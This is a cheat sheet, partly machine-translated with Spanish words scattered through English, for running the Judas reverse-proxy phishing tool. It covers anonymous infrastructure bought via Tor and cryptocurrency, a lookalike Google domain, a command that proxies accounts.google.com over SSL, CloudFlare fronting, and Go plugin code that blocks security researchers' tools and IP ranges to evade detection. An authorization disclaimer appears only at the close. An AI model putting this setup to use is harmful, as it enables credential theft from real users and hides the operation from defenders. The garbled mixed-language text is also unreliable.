# Use VPS with anonymous payment
# Setup through Tor/VPN
# Use legitimate domain names
# Implement proper SSL certificados
# ejemplo secure deployment
# 1. Purchase VPS with cryptocurrency
# 2. Access through Tor browser
# 3. Register domain with privacy protection
# 4. Setup Let's Encrypt SSL
# 5. Configure proper logging and monitoring
Domain and SSL Setup
# Register legitimate-looking domain
# ejemplo: accounts-google-verification.com
# Setup Let's Encrypt SSL
certbot certonly --standalone -d your-domain.com
# Use with Judas
judas --objetivo https://accounts.google.com \
--address 0.0.0.0:443 \
--ssl-cert /etc/letsencrypt/live/your-domain.com/fullchain.pem \
--ssl-clave /etc/letsencrypt/live/your-domain.com/privclave.pem
Traffic Obfuscation
# Use CDN servicios (CloudFlare, AWS CloudFront)
# Implement realistic timing delays
# Use common puertos (80, 443)
# Mimic legitimate traffic patterns
# ejemplo CloudFlare setup
# 1. Add domain to CloudFlare
# 2. Configure DNS records
# 3. Enable proxy (orange cloud)
# 4. Configure security settings
# 5. Point to Judas proxy
Anti-Detection Measures
// Implement anti-detection in Judas plugins
func (p *AntiDetectionPlugin) procesoRequest(req *http.Request) error \\\\{
userAgent := req.UserAgent()
// Block security tools
securityTools := []string\\\\{
"curl", "wget", "python-requests", "scanner",
"bot", "crawler", "security", "research",
\\\\}
for _, tool := range securityTools \\\\{
if strings.Contains(strings.ToLower(userAgent), tool) \\\\{
return errors.New("blocked security tool")
\\\\}
\\\\}
// Check for known security company IP ranges
clientIP := getClientIP(req)
if isSecurityCompanyIP(clientIP) \\\\{
return errors.New("blocked security company IP")
\\\\}
return nil
\\\\}
solución de problemas
Common Issues
# puerto already in use
sudo netstat -tulpn|grep :8080
sudo kill -9 $(sudo lsof -t -i:8080)
# SSL certificado issues
# Check certificado validity
openssl x509 -in cert.pem -text -noout
# objetivo website blocking proxy
# Use different user agents
# Implement request delays
# Use proxy chains
# Plugin compilation errors
go mod tidy
go build -o plugin.so -buildmode=plugin plugin.go
Debug Mode
# Enable verbose logging
judas --objetivo https://ejemplo.com --address localhost:8080 --verbose
# Check Judas logs
tail -f judas.log
# Test proxy functionality
curl -v http://localhost:8080
# Verify SSL configuración
openssl s_client -connect localhost:443
Performance Optimization
# Optimize for high traffic
# Increase file descriptor limits
ulimit -n 65536
# Monitor resource uso
htop
iotop
netstat -tulpn
# Use conexión pooling
# Implement caching
# Scale horizontally with load balancer
Best Practices
Campaign Planning
- objetivo analysis: Understand objetivo website structure and behavior
- Infrastructure setup: Use secure and anonymous hosting
- Domain selection: Choose convincing domain names
- SSL implementation: Use legitimate SSL certificados
- Plugin development: Create custom plugins for specific needs
Legal and Ethical Considerations
# Authorized testing only
# Obtain proper written autorización
# Follow responsible disclosure
# Protect captured data
# Document all activities
# Data protection measures
# Encrypt captured credenciales
# Secure data transmission
# Implement data retention policies
# Regular security audits
Performance and Scalability
# Optimize proxy performance
# Use efficient plugins
# Implement caching strategies
# Monitor resource uso
# Scale infrastructure as needed
# ejemplo load balancing setup
# Use nginx or HAProxy
# Distribute traffic across multiple Judas instances
# Implement health checks
Resources
- Judas GitHub Repository
- Go Programming Language
- Reverse Proxy Concepts
- OWASP phishing Guide
- Let's Encrypt SSL certificados
This hoja de trucos provides a comprehensive reference for using Judas phishing proxy. Always ensure you have proper autorización before conducting phishing simulations or pruebas de penetración.